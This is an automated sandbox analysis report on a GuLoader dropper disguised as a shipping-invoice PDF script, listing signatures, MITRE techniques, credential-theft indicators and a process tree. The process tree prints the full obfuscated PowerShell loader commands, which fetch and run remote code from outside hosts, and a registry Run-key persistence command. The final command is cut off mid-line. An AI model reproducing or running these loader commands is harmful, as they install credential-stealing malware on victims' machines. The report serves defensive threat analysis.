guloader | d7d478e5d58684d5842ac05e5ca9f094266d5583aafc7ba280124d114943af89

Analysis

max time kernel
149s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
22/08/2024, 12:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

waybill_original_invoice_bl_packing_list_shipment_22_08_2024_00000_pdf.vbs
Size

134KB
MD5

597c7745de1949be25d9c4849aa11cb7
SHA1

e2001dadfe1233b12c11b8cc1954f9183633a4fb
SHA256

31fc0e3296a248e9957c62e4060c92b895ca6ebb0a828e00ab7ef3608c498fb4
SHA512

7bb22bc64793ec32363fc409f38830fc101222239a4ee58a97cbfcc00d19a06a5da5a18c3eead92f04f5a3c52505bdb2883f542479858dc2b84653d96d28c2ce
SSDEEP

3072:FjGO63YDSdYB51Gy/ABuIWHwxoH0sHXaHb0bIkNTEx29Ojmplsz:NGO63WSdYB51Gy/quNHwaHdHqHb0bIko

Score

10^/10

guloader collection credential_access defense_evasion discovery downloader execution persistence privilege_escalation stealer

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/4848-65-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/1488-63-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/3616-62-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/1488-63-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/4848-65-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 4 IoCs

flow	pid	Process
3	392	WScript.exe
11	4524	powershell.exe
80	4148	powershell.exe
82	4148	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	wab.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\orthotoluic = "%smaakravls% -w 1 $knkortes=(Get-ItemProperty -Path 'HKCU:\\brodserne\\').Talemaaderne;%smaakravls% ($knkortes)"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4524	powershell.exe
3432	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
2372	wab.exe
2372	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
3432	powershell.exe
2372	wab.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 3432 set thread context of 2372	3432	powershell.exe	109
PID 2372 set thread context of 4848	2372	wab.exe	114
PID 2372 set thread context of 1488	2372	wab.exe	115
PID 2372 set thread context of 3616	2372	wab.exe	116

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
4148	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wab.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wab.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wab.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wab.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings	wab.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1836	reg.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
4524	powershell.exe
4524	powershell.exe
3432	powershell.exe
3432	powershell.exe
3432	powershell.exe
3616	wab.exe
3616	wab.exe
4848	wab.exe
4848	wab.exe
4848	wab.exe
4848	wab.exe
4148	powershell.exe
4148	powershell.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
3432	powershell.exe
2372	wab.exe
2372	wab.exe
2372	wab.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	4524	powershell.exe
Token: SeDebugPrivilege	3432	powershell.exe
Token: SeDebugPrivilege	3616	wab.exe
Token: SeDebugPrivilege	4148	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2372	wab.exe

Suspicious use of WriteProcessMemory 42 IoCs

description	pid	Process	procid_target
PID 392 wrote to memory of 4524	392	WScript.exe	87
PID 392 wrote to memory of 4524	392	WScript.exe	87
PID 4524 wrote to memory of 3332	4524	powershell.exe	89
PID 4524 wrote to memory of 3332	4524	powershell.exe	89
PID 4524 wrote to memory of 3432	4524	powershell.exe	106
PID 4524 wrote to memory of 3432	4524	powershell.exe	106
PID 4524 wrote to memory of 3432	4524	powershell.exe	106
PID 3432 wrote to memory of 1608	3432	powershell.exe	107
PID 3432 wrote to memory of 1608	3432	powershell.exe	107
PID 3432 wrote to memory of 1608	3432	powershell.exe	107
PID 3432 wrote to memory of 2372	3432	powershell.exe	109
PID 3432 wrote to memory of 2372	3432	powershell.exe	109
PID 3432 wrote to memory of 2372	3432	powershell.exe	109
PID 3432 wrote to memory of 2372	3432	powershell.exe	109
PID 3432 wrote to memory of 2372	3432	powershell.exe	109
PID 2372 wrote to memory of 1472	2372	wab.exe	110
PID 2372 wrote to memory of 1472	2372	wab.exe	110
PID 2372 wrote to memory of 1472	2372	wab.exe	110
PID 1472 wrote to memory of 1836	1472	cmd.exe	112
PID 1472 wrote to memory of 1836	1472	cmd.exe	112
PID 1472 wrote to memory of 1836	1472	cmd.exe	112
PID 2372 wrote to memory of 1940	2372	wab.exe	113
PID 2372 wrote to memory of 1940	2372	wab.exe	113
PID 2372 wrote to memory of 1940	2372	wab.exe	113
PID 2372 wrote to memory of 4848	2372	wab.exe	114
PID 2372 wrote to memory of 4848	2372	wab.exe	114
PID 2372 wrote to memory of 4848	2372	wab.exe	114
PID 2372 wrote to memory of 4848	2372	wab.exe	114
PID 2372 wrote to memory of 1488	2372	wab.exe	115
PID 2372 wrote to memory of 1488	2372	wab.exe	115
PID 2372 wrote to memory of 1488	2372	wab.exe	115
PID 2372 wrote to memory of 1488	2372	wab.exe	115
PID 2372 wrote to memory of 3616	2372	wab.exe	116
PID 2372 wrote to memory of 3616	2372	wab.exe	116
PID 2372 wrote to memory of 3616	2372	wab.exe	116
PID 2372 wrote to memory of 3616	2372	wab.exe	116
PID 1940 wrote to memory of 4148	1940	WScript.exe	117
PID 1940 wrote to memory of 4148	1940	WScript.exe	117
PID 1940 wrote to memory of 4148	1940	WScript.exe	117
PID 4148 wrote to memory of 1952	4148	powershell.exe	119
PID 4148 wrote to memory of 1952	4148	powershell.exe	119
PID 4148 wrote to memory of 1952	4148	powershell.exe	119

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\waybill_original_invoice_bl_packing_list_shipment_22_08_2024_00000_pdf.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:392
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentCulture) {$Autogeneses199='SUBsTR';$Magmaen++;}$Autogeneses199+='ing';Function Brahmas($Tunder){$Misusurped=$Tunder.Length-$Magmaen;For( $imbroglios=2;$imbroglios -lt $Misusurped;$imbroglios+=3){$Dendrodic+=$Tunder.$Autogeneses199.'Invoke'( $imbroglios, $Magmaen);}$Dendrodic;}function Bromides($Hvlvingen){ & ($Krigserklringer) ($Hvlvingen);}$Vrdipakker=Brahmas 'AuMpuoUnz RiFal AlKaaHa/Se5Ru.Pr0Fr E(IlWStiKon,rdAuo owT.sSt .kN VT a Fo1Sy0,a.Je0 r;Te t.WMoi nVe6B.4Lo;Mi Ix p6An4 U;Ud Inr ovGa:Ho1 R2Fi1Lu.Fi0Pe) U S.G,oeTecE k.eoDi/ B2Cl0H 1.r0su0En1Tr0an1Mu LaF ri Kr.ee ofHyoV,xPa/ 1Pr2S,1Se.,i0Li ';$Afprvningsstrategierne=Brahmas ' eUUnsVeeK,rS.-EnAP,gO,eInn PtKa ';$Gillnetting=Brahmas 'soh Rt Ut Rpeps a:F /St/PrjT,aTeh.seP,z.i.T.mFie n/F,w ppu/ .Csna.ir .i PcIra ,tAguP,rGae.ndEm.SieBemSaz,y> hSotU,tGrpFl:Cy/Ha/F.cAtpS.aV n ,eChl M-E.a DdBom i tn Rh ,o.asRatNo. ScCooGlmSe/ uC iaC rBoiSkc Bap.tSku grOveDad O..leSemS.zCh ';$Bandar=Brahmas 'Pe> F ';$Krigserklringer=Brahmas 'rei.eeU xSu ';$Shwa='Balmain';$Aarens = Brahmas ',ee.ecGlhI oCi N%ReaOmpRopFadAla BtA aLe%Mi\ aPSarAroKaiA,n FqGnuH.i Ar ,yC . ,N,nuHol O Te&B &Ho Pee,ec .hFuoIm v,tPa ';Bromides (Brahmas 'Ud$Plgcil Go DbBaaTvl.i:.oP ,eOdrKriMac Ty Vt SiA a l.a=As(Trc Nm.ndGa ./Skc , Ln$ImA .aUnrDie TnD sMo) U ');Bromides (Brahmas ' ,$Nog,elK oTobHea.alRo:DeTS eNonStdopeCor rlfly =Mi$MaGQ iBelSklR,n le MtAlt,niT nDigt . MsSmpAnlhai,atS.(,e$N,B.xaUan,ndSkaGerS.)Le ');Bromides (Brahmas 'No[H.NI.eSkt,o.ViSOpeSyr,ivMaiGecDaeBeP roOki.enLatDeML aFoncea ,g teDir Q]Sk: a:ShSAreR cS u.arFoiJutMyyNoP er eo Et Fo AcSooFrlRe ,p=Al N[T.NAre ItM..GeS eArc ,uUar,riDet Ay .PB,rs,oButBaoP,cKuofalClTHoyMip,deW,]Ar:Ma: ,T Ul TsPr1U.2 ');$Gillnetting=$Tenderly[0];$Scarecrows184= (Brahmas 'Fo$ agkol,lo.obv.a PlUn:K.r oe Kg RnBes,pkPea MbEb=MeNSle.yw - SO ,bBrjReeBlc BtOv ,oS yB sdateseL m ,.TrN AeEnt,r. fW ,eOrbAfC EleririeHvnvat');$Scarecrows184+=$Pericytial[1];Bromides ($Scarecrows184);Bromides (Brahmas ' H$,tr.eeP gK nT,sFek ua GbBe.D,HuveDeaAld,reF rKosH.[Kv$ A ,f fpu rGev inA.ihsn,ng,ns LsCotU rMiaCat PeFig giVaeKarAxnb.eTy]Ba= ,$esV ar Od,niPrpSpaR.kHjkAre,ur l ');$Ethnolog=Brahmas 'Un$LirGie ,g UnJesGok,kaSpbFr. SD HoU.wRankolKoo,aaskd,uF HiUnlTveh.( T$PlGMoiPrlfolS nSpeBatK tKriTyn,rgLa,Su$TrS UaRecDirIdidaf GyC,)e. ';$Sacrify=$Pericytial[0];Bromides (Brahmas 'Tr$,ogChlheoSeb Aa ,lNa: GF AeA.uVadSuaBel ts ly Ascat Ge.hmCeeBot U5Fu8Af=Co(GeTTveFlsMitVk-CeP .aTrt AhF Pr$S,SBraDrcM.rT,iFuf.iy,p)ch ');while (!$Feudalsystemet58) {Bromides (Brahmas 'Fo$Gug BlSposebTra ,lP,:noPKoa enCutshe .bSmrHjeKrv Bssks .pDarU.gWisDam ,a oaJel .e ,tB =Cy$TetF,rDou .es. ') ;Bromides $Ethnolog;Bromides (Brahmas ' pS,htCraPrr ,tVa- SSDil ,ePreFopSe Kv4Ma ');Bromides (Brahmas 'F $ agImlSpo .b .a.glTu:E.F ,eV.uPld iaa l ls EyTes.etBaeTsmSle otUn5lu8Py=Tu(SlT eE.s,etCa- ,PMia .t,ihDy An$T.SPra,ic,krD iLaf.oy .)S, ') ;Bromides (Brahmas '.h$.jgMul.yonobF.aOplPe:UlFU i erMaeVrdD.a CmW.pIbsN.= e$ ,gMol.koSkbBaaEblsn: RSKah GrLiaBemBye.a+Ba+Bi%Su$ VTL eInn d De ErSwlL.yUn.TecSuo,ouInnTytbr ') ;$Gillnetting=$Tenderly[$Firedamps];}$Rovingness=333383;$Dannelsestrinnene=27637;Bromides (Brahmas 'Re$Krg cl eoV.bFjaGal f:EnB nuKanK.d PfLil,odTrnBuiRinHogA.eGlrTin Ie MsSa F= N eGh.eT t ,-S,COuoHonB.t eArns.tIn Be$HjS,aaBlcFer i BfKay B ');Bromides (Brahmas 'Br$ egB,lK oJub.ea Ll.i:,op OoMos tS.cSloDis Ct ZaG lN S,=Da An[ SS,dyGrsSetTje HmIn.AdCChoTanCovOreU,rNatTv]U : n:,rFHyr DoY.mk B ,aPrsFoeMe6 D4 oSD,tDor ,i .n,ugFe(.s$R,BD,utrnAfdS f,rl ,d.nnDuiUdnTlgMaeCerGlnPeevesKl)Ji ');Bromides (Brahmas ' L$ Tg,hlM,oLob,laBul W: UC.eu.msH tReo.amTaa obBal ceAm Ko=Af Se[MeSUnyP sTyt SeU.m.d. aT.ie ,x ,tU,.AnEC,nPlcSkoC dBeikinDeg ,]Fi: K:HeAQuSFoCSvI sIFa. .GDie OtH Sist.orEriChnPhgAm(.i$ Ap oo RsRetB cDvo SsAltSea,flof),o ');Bromides (Brahmas 'at$SygC.lM,oQub,oa.mlFo:.aOLalLieKir HaBicB,efoo MuSts D=An$SkCLyumasMatRnoD,mIna,pbfolJue a.Uns iuRobB.sAttTorCiiSknSeg ( .$ EREno ovBai cn,ogStnOpe .sMus ., E$niD ,a In XnTae ml Is PeFrs atSprH iPan unRee.jnsieMa)L, ');Bromides $Oleraceous;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4524
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proinquiry.Nul && echo t"
    3⤵
    PID:3332
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentCulture) {$Autogeneses199='SUBsTR';$Magmaen++;}$Autogeneses199+='ing';Function Brahmas($Tunder){$Misusurped=$Tunder.Length-$Magmaen;For( $imbroglios=2;$imbroglios -lt $Misusurped;$imbroglios+=3){$Dendrodic+=$Tunder.$Autogeneses199.'Invoke'( $imbroglios, $Magmaen);}$Dendrodic;}function Bromides($Hvlvingen){ & ($Krigserklringer) ($Hvlvingen);}$Vrdipakker=Brahmas 'AuMpuoUnz RiFal AlKaaHa/Se5Ru.Pr0Fr E(IlWStiKon,rdAuo owT.sSt .kN VT a Fo1Sy0,a.Je0 r;Te t.WMoi nVe6B.4Lo;Mi Ix p6An4 U;Ud Inr ovGa:Ho1 R2Fi1Lu.Fi0Pe) U S.G,oeTecE k.eoDi/ B2Cl0H 1.r0su0En1Tr0an1Mu LaF ri Kr.ee ofHyoV,xPa/ 1Pr2S,1Se.,i0Li ';$Afprvningsstrategierne=Brahmas ' eUUnsVeeK,rS.-EnAP,gO,eInn PtKa ';$Gillnetting=Brahmas 'soh Rt Ut Rpeps a:F /St/PrjT,aTeh.seP,z.i.T.mFie n/F,w ppu/ .Csna.ir .i PcIra ,tAguP,rGae.ndEm.SieBemSaz,y> hSotU,tGrpFl:Cy/Ha/F.cAtpS.aV n ,eChl M-E.a DdBom i tn Rh ,o.asRatNo. ScCooGlmSe/ uC iaC rBoiSkc Bap.tSku grOveDad O..leSemS.zCh ';$Bandar=Brahmas 'Pe> F ';$Krigserklringer=Brahmas 'rei.eeU xSu ';$Shwa='Balmain';$Aarens = Brahmas ',ee.ecGlhI oCi N%ReaOmpRopFadAla BtA aLe%Mi\ aPSarAroKaiA,n FqGnuH.i Ar ,yC . ,N,nuHol O Te&B &Ho Pee,ec .hFuoIm v,tPa ';Bromides (Brahmas 'Ud$Plgcil Go DbBaaTvl.i:.oP ,eOdrKriMac Ty Vt SiA a l.a=As(Trc Nm.ndGa ./Skc , Ln$ImA .aUnrDie TnD sMo) U ');Bromides (Brahmas ' ,$Nog,elK oTobHea.alRo:DeTS eNonStdopeCor rlfly =Mi$MaGQ iBelSklR,n le MtAlt,niT nDigt . MsSmpAnlhai,atS.(,e$N,B.xaUan,ndSkaGerS.)Le ');Bromides (Brahmas 'No[H.NI.eSkt,o.ViSOpeSyr,ivMaiGecDaeBeP roOki.enLatDeML aFoncea ,g teDir Q]Sk: a:ShSAreR cS u.arFoiJutMyyNoP er eo Et Fo AcSooFrlRe ,p=Al N[T.NAre ItM..GeS eArc ,uUar,riDet Ay .PB,rs,oButBaoP,cKuofalClTHoyMip,deW,]Ar:Ma: ,T Ul TsPr1U.2 ');$Gillnetting=$Tenderly[0];$Scarecrows184= (Brahmas 'Fo$ agkol,lo.obv.a PlUn:K.r oe Kg RnBes,pkPea MbEb=MeNSle.yw - SO ,bBrjReeBlc BtOv ,oS yB sdateseL m ,.TrN AeEnt,r. fW ,eOrbAfC EleririeHvnvat');$Scarecrows184+=$Pericytial[1];Bromides ($Scarecrows184);Bromides (Brahmas ' H$,tr.eeP gK nT,sFek ua GbBe.D,HuveDeaAld,reF rKosH.[Kv$ A ,f fpu rGev inA.ihsn,ng,ns LsCotU rMiaCat PeFig giVaeKarAxnb.eTy]Ba= ,$esV ar Od,niPrpSpaR.kHjkAre,ur l ');$Ethnolog=Brahmas 'Un$LirGie ,g UnJesGok,kaSpbFr. SD HoU.wRankolKoo,aaskd,uF HiUnlTveh.( T$PlGMoiPrlfolS nSpeBatK tKriTyn,rgLa,Su$TrS UaRecDirIdidaf GyC,)e. ';$Sacrify=$Pericytial[0];Bromides (Brahmas 'Tr$,ogChlheoSeb Aa ,lNa: GF AeA.uVadSuaBel ts ly Ascat Ge.hmCeeBot U5Fu8Af=Co(GeTTveFlsMitVk-CeP .aTrt AhF Pr$S,SBraDrcM.rT,iFuf.iy,p)ch ');while (!$Feudalsystemet58) {Bromides (Brahmas 'Fo$Gug BlSposebTra ,lP,:noPKoa enCutshe .bSmrHjeKrv Bssks .pDarU.gWisDam ,a oaJel .e ,tB =Cy$TetF,rDou .es. ') ;Bromides $Ethnolog;Bromides (Brahmas ' pS,htCraPrr ,tVa- SSDil ,ePreFopSe Kv4Ma ');Bromides (Brahmas 'F $ agImlSpo .b .a.glTu:E.F ,eV.uPld iaa l ls EyTes.etBaeTsmSle otUn5lu8Py=Tu(SlT eE.s,etCa- ,PMia .t,ihDy An$T.SPra,ic,krD iLaf.oy .)S, ') ;Bromides (Brahmas '.h$.jgMul.yonobF.aOplPe:UlFU i erMaeVrdD.a CmW.pIbsN.= e$ ,gMol.koSkbBaaEblsn: RSKah GrLiaBemBye.a+Ba+Bi%Su$ VTL eInn d De ErSwlL.yUn.TecSuo,ouInnTytbr ') ;$Gillnetting=$Tenderly[$Firedamps];}$Rovingness=333383;$Dannelsestrinnene=27637;Bromides (Brahmas 'Re$Krg cl eoV.bFjaGal f:EnB nuKanK.d PfLil,odTrnBuiRinHogA.eGlrTin Ie MsSa F= N eGh.eT t ,-S,COuoHonB.t eArns.tIn Be$HjS,aaBlcFer i BfKay B ');Bromides (Brahmas 'Br$ egB,lK oJub.ea Ll.i:,op OoMos tS.cSloDis Ct ZaG lN S,=Da An[ SS,dyGrsSetTje HmIn.AdCChoTanCovOreU,rNatTv]U : n:,rFHyr DoY.mk B ,aPrsFoeMe6 D4 oSD,tDor ,i .n,ugFe(.s$R,BD,utrnAfdS f,rl ,d.nnDuiUdnTlgMaeCerGlnPeevesKl)Ji ');Bromides (Brahmas ' L$ Tg,hlM,oLob,laBul W: UC.eu.msH tReo.amTaa obBal ceAm Ko=Af Se[MeSUnyP sTyt SeU.m.d. aT.ie ,x ,tU,.AnEC,nPlcSkoC dBeikinDeg ,]Fi: K:HeAQuSFoCSvI sIFa. .GDie OtH Sist.orEriChnPhgAm(.i$ Ap oo RsRetB cDvo SsAltSea,flof),o ');Bromides (Brahmas 'at$SygC.lM,oQub,oa.mlFo:.aOLalLieKir HaBicB,efoo MuSts D=An$SkCLyumasMatRnoD,mIna,pbfolJue a.Uns iuRobB.sAttTorCiiSknSeg ( .$ EREno ovBai cn,ogStnOpe .sMus ., E$niD ,a In XnTae ml Is PeFrs atSprH iPan unRee.jnsieMa)L, ');Bromides $Oleraceous;"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3432
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proinquiry.Nul && echo t"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1608
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious behavior: MapViewOfSection
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2372
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "orthotoluic" /t REG_EXPAND_SZ /d "%smaakravls% -w 1 $knkortes=(Get-ItemProperty -Path 'HKCU:\brodserne\').Talemaaderne;%smaakravls% ($knkortes)"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1472
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "orthotoluic" /t REG_EXPAND_SZ /d "%smaakravls% -w 1 $knkortes=(Get-ItemProperty -Path 'HKCU:\brodserne\').Talemaaderne;%smaakravls% ($knkortes)"
        6⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:1836
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Trekanterne174.vbs"
        5⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1940
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "write 'Deaktivering250 Sterilizabilities Desilver Busboy Ischiovertebral Yemen Geotekniske Pagterne Graphoscope preoccupation Lurkers Palliatively Sladrehankenes platybrachycephalous Retshistorie Qualification Kaprendes Undseligheds Orthogonalized Menulinie Prgnantest Larms Antipestilential Blomsterlgene Deaktivering250 Sterilizabilities Desilver Busboy Ischiovertebral Yemen Geotekniske Pagterne Graphoscope preoccupation Lurkers Palliatively Sladrehankenes platybrachycephalous Retshistorie Qualification Kaprendes Undseligheds Orthogonalized Menulinie Prgnantest Larms Antipestilential Blomsterlgene';If (${host}.CurrentCulture) {$Ruefulness='SUBsTR';$Danmarksmestrenes++;}$Ruefulness+='ing';Function semisavage($Semicultivated){$Attesterer=$Semicultivated.Length-$Danmarksmestrenes;For( $Saetningsblok=2;$Saetningsblok -lt $Attesterer;$Saetningsblok+=3){$Deaktivering250+=$Semicultivated.$Ruefulness.'Invoke'( $Saetningsblok, $Danmarksmestrenes);}$Deaktivering250;}function bagstagets($Mirrorise){ . ($Fetichize) ($Mirrorise);}$Nedtrappedes=semisavage 'AfM,eoVezMiiF,lB lAra ,/ S5In.Ko0Af Fe(EuWDei DnredN,oJaw,tsFi .uNSaTR. U1 .0Ha.He0Si; K BaW riTjnMa6 f4ko;Re LaxL.6 K4Be; , urChv.a: ,1Ov2He1,a. M0Re) u SoGBeeL,cBlkKroPr/M.2,o0 ,1 .0 0 E1Ap0 B1St TrFCri,irBeePefr o NxBe/Un1Re2Wi1Mi.Im0Fo ';$Speronaros33=semisavage ' .UAdsCheSurWa- OARigD e OnClt ';$Ischiovertebral=semisavage 'W.hN.t tF.pDusB.:In/ru/,twFoe Kl Occlo Um DsSlpMalHyuHasEn.Unr BuSk/G wMipSt-KoaM,d Sm oiRanA./Chu Bs,fe Ur .s.e/p MSviGdj Ua c.BofInlW.aPr ';$Badeomraaderne=semisavage 'U > L ';$Fetichize=semisavage 'Udi ,e NxNo ';$Chromocyte='Pagterne';$Dysgenical = semisavage 'SceSkcTrhPeo , ,l%DeaRepF,p AdWiaObtSkaAn%.h\,iPDoo usTrhSooTo..rSF gsasB, Mo&Ve& D .eD,cAshhao,i Yht h ';bagstagets (semisavage ' E$K gRelS,o,fbBea ylLe: D.te r.ciSte ,t u=Me(L.c Sm TdSt Ud/SycRu Un$H,D AyGrsCrgCoeTunCaiFecVaaB lA )Gt ');bagstagets (semisavage 'St$StgRilT,oSabtoaSilAn: JB wu FsV,bGloTayR.=Ge$ lIBysr,cKrhSti doAhvMae ErTot eEdbl rRaaQdlHy. LsOopSklKoiA,tTo(,l$M,BN aNudFleKroPemTorUnaSaa Ad .eOvrFenH,e.a)G. ');bagstagets (semisavage 'Un[ ,N FeI t.n.F.S.xeU,rIsvReiAtcIde .PBlo PiWenMatSmM NaU,n aaPeg ,eBerEp]Be:Ha:DrSlaeOpcStuStrRei Ft,iyDePSur ,oLatBloVicsyo FlS, S=,a Hu[ .NBleUnt S.ErSP eAuc LuI.rekiEst iyDrPSpr Bo Dt LoStcT,osulP.TFryKwpPle o]Un:U :hoT RlXas D1.e2 R ');$Ischiovertebral=$Busboy[0];$pvc= (semisavage 'pa$Kog SlLio ,bScas lTh:a.SBiehac.urP euntN iEun.esPi=PeNFreLowUn- UOOvb.ej.telocSatE. ImSL.yS s Pt Me mdo. N reent J.HnWPreI,bsuCA,lD i LeDenVgt');$pvc+=$Deriet[1];bagstagets ($pvc);bagstagets (semisavage 'E.$InSFieFecBarOpe RtEli anExsSi.AdHmiePha rdBle,er Bs,a[Fl$DeSCopAseG rNeoSknFoaD,rReoAssRa3ph3Ur] P=Ka$NoN.oe ,dU t SrAsaplpb,p .eAadSueDesFu ');$Fnernes=semisavage 'ag$p,S Le Sc .r neLft iSun MsBe.muDStoSkwPhnPrlh,oTnaSwdHaFgui MlBee i(,n$UdI,lsEpcBih PiHaoNivM e MrE.tBres.bHvrGaaKnl .,em$ TL,kaForD.mbrs.f) . ';$Larms=$Deriet[0];bagstagets (semisavage 'Ma$S.gInlAloW.b yaE.lKo: SS.oeC lT vOpmStoledEqsSliHagUneMolAisoseL.s .=Ju(umTU eP,sOvt.k-UnP UaD,tRehPr No$siL .a ,rF,mRusH.)El ');while (!$Selvmodsigelses) {bagstagets (semisavage 'Pa$ HgLol.toOfb Pa.ylKr:SeH UuSarFrtHafChuRelti=.u$ ,tE,r gupeeVi ') ;bagstagets $Fnernes;bagstagets (semisavage ' BSRut ,aBrrButWy- aSPelUle,reFlpS. Se4s. ');bagstagets (semisavage ' R$Trg BlUdoAbbIna PlHi:UnS,pe Fl,evTrm.co dUbs eiSig De gl Ms.fe PsBe=Po( NTAleDes at.a- oPNoaBet ThO Da$ChL .aInr,am.osP )Du ') ;bagstagets (semisavage 'Op$DigL,lovoSkbPha Al s: oD,ueT s.picolBevv,e.rrNo=Ro$ShgS,lDeo .bFlaHilF.:P SMetAfeAsr FiBrlodiEuzE,aSabStiPrl 